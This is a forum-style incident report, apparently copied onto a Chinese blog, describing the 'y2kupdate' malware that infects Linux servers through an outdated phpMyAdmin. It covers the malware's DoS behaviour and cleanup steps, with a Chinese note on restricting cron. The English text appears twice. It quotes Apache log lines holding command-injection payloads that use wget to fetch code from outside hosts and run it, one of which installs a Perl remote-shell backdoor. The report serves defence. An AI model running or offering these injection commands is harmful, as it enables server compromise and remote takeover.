y2kupdate denial of service vulnerability
[ Log in to get rid of this advertisement]
[ Log in to get rid of this advertisement]
I am posting here to warn others about y2kupdate.
I have experienced two denial of service attacks in the last two weeks as a result of this "application" and wished to warn others.
The entry point to install the software on the Linux servers was a vulnerabilty in an out of date version of phpMyAdmin.
The apache access_log entry which shows the initial infection taking place is shown below:
GET /admin/config/config.inc.php?c=uname%20-a
GET /admin/config/config.inc.php?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck
An analysis of the last line of the above log entry reveals:
1) Vulnerability in phpMyAdmin exploited via /admin/config/config.inc.php
2) wget used to fetch bh.tgz into /tmp directory
3) bh.tgz unpacked into /tmp/.pid driectory and source archive deleted
4) init executable run from /tmp/.pid
5) f*** script run from /tmp/.pid
The init executable appears, amongst other things, to start a proxy server. This displaces httpd and listens on ports 80 and 443. The sign of this is that using the command netstat -lnpt shows that ports 80 and 443 are held open by the init or cron processes instead of httpd. Despite this the Web content on the server is available as normal, until an external trigger? puts init (or std?) into attack mode. At this point the server goes to 100% CPU time and spends it's whole time pushing out dos packets onto the intranet and internet. The only effective way of stopping this appears to be to reboot the server, at which point apache httpd takes back control of ports 80 and 443.
The f*** shell script starts a once a minute cron job as user apache, which calls the y2kupdate application. I have not yet worked out what this may be doing, although I suspect it may be trying to communicate with other servers over the Internet as there is a file called bang.txt in the .pid folder that contains a list of around 15K IP addresses. The easiest way to stop y2kupdate is to erase the apache cron job.
The above applications can be installed into three possible locations, /tmp, /var/tmp & /dev/shm and these should be checked for suspicious hidden directories/files. Once found it is important to delete the suspicious items.
It is also important to change the permissions (chmod 750) on /usr/bin/wget, /usr/bin/lwp-download and /usr/bin/curl so they can only be used by root to fetch files off the Internet. This is a precautionary measure as once someone has obtained access to a server via a PHP or Perl backdoor these three commands seem to be the main way of downloading unwanted applications.
Also of course it is vitally important to download the latest version of phpMyAdmin to close the vulnerability down.
Additionally there appears to be a second class of application that can expliot the phpMyAdmin vulnerability. This is a perl script, which goes by various names, including ize. This appears to allow a remote user shell command line access to the server as user Apache. Once again it can be found in /tmp, /var/tmp or /dev/shm.
An Apache log entry which shows this type of backdoor exploit is shown below:
GET /admin/config/config.inc.php?c=cd+/tmp;wget+sportblad.com/b.txt;perl+b.txt;rm+rf-+b.txt
For more information on these vulnerabilities please visit: http://www.securityfocus.com/infocus/1871
就是通过www-data(apache的用户) 建立cron 每分钟跑一个/tmp 底下的一个什么东西。。
解决办法是 禁止apache跑cron
再查得到禁止某用户cron的方法
同root一样,普通用户也可以使用cron来重复运行程序。要执行的任务通过crontab命令来提交给cron执行。root通过/var/adm/cron/cron.allow文件来控制谁有权使用crontab命令。如果用户的名字出现在cron.allow文件中,他就有权使用crontab命令。如果cron.allow文件不存在,系统会检查/var/adm/cron/cron.deny文件来确定是否这个用户被拒绝存取。如果两个文件都存在,cron.allow有优先权。如果两个文件都不存在,只有root可以提交任务。如果cron.deny文件为空文件,所有的用户都可以使用crontab.
I have experienced two denial of service attacks in the last two weeks as a result of this "application" and wished to warn others.
The entry point to install the software on the Linux servers was a vulnerabilty in an out of date version of phpMyAdmin.
The apache access_log entry which shows the initial infection taking place is shown below:
GET /admin/config/config.inc.php?c=uname%20-a
GET /admin/config/config.inc.php?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck
An analysis of the last line of the above log entry reveals:
1) Vulnerability in phpMyAdmin exploited via /admin/config/config.inc.php
2) wget used to fetch bh.tgz into /tmp directory
3) bh.tgz unpacked into /tmp/.pid driectory and source archive deleted
4) init executable run from /tmp/.pid
5) f*** script run from /tmp/.pid
The init executable appears, amongst other things, to start a proxy server. This displaces httpd and listens on ports 80 and 443. The sign of this is that using the command netstat -lnpt shows that ports 80 and 443 are held open by the init or cron processes instead of httpd. Despite this the Web content on the server is available as normal, until an external trigger? puts init (or std?) into attack mode. At this point the server goes to 100% CPU time and spends it's whole time pushing out dos packets onto the intranet and internet. The only effective way of stopping this appears to be to reboot the server, at which point apache httpd takes back control of ports 80 and 443.
The f*** shell script starts a once a minute cron job as user apache, which calls the y2kupdate application. I have not yet worked out what this may be doing, although I suspect it may be trying to communicate with other servers over the Internet as there is a file called bang.txt in the .pid folder that contains a list of around 15K IP addresses. The easiest way to stop y2kupdate is to erase the apache cron job.
The above applications can be installed into three possible locations, /tmp, /var/tmp & /dev/shm and these should be checked for suspicious hidden directories/files. Once found it is important to delete the suspicious items.
It is also important to change the permissions (chmod 750) on /usr/bin/wget, /usr/bin/lwp-download and /usr/bin/curl so they can only be used by root to fetch files off the Internet. This is a precautionary measure as once someone has obtained access to a server via a PHP or Perl backdoor these three commands seem to be the main way of downloading unwanted applications.
Also of course it is vitally important to download the latest version of phpMyAdmin to close the vulnerability down.
Additionally there appears to be a second class of application that can expliot the phpMyAdmin vulnerability. This is a perl script, which goes by various names, including ize. This appears to allow a remote user shell command line access to the server as user Apache. Once again it can be found in /tmp, /var/tmp or /dev/shm.
An Apache log entry which shows this type of backdoor exploit is shown below:
GET /admin/config/config.inc.php?c=cd+/tmp;wget+sportblad.com/b.txt;perl+b.txt;rm+rf-+b.txt
For more information on these vulnerabilities please visit: http://www.securityfocus.com/infocus/1871
就是通过www-data(apache的用户) 建立cron 每分钟跑一个/tmp 底下的一个什么东西。。
解决办法是 禁止apache跑cron
再查得到禁止某用户cron的方法
同root一样,普通用户也可以使用cron来重复运行程序。要执行的任务通过crontab命令来提交给cron执行。root通过/var/adm/cron/cron.allow文件来控制谁有权使用crontab命令。如果用户的名字出现在cron.allow文件中,他就有权使用crontab命令。如果cron.allow文件不存在,系统会检查/var/adm/cron/cron.deny文件来确定是否这个用户被拒绝存取。如果两个文件都存在,cron.allow有优先权。如果两个文件都不存在,只有root可以提交任务。如果cron.deny文件为空文件,所有的用户都可以使用crontab.
扫一扫
7587
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
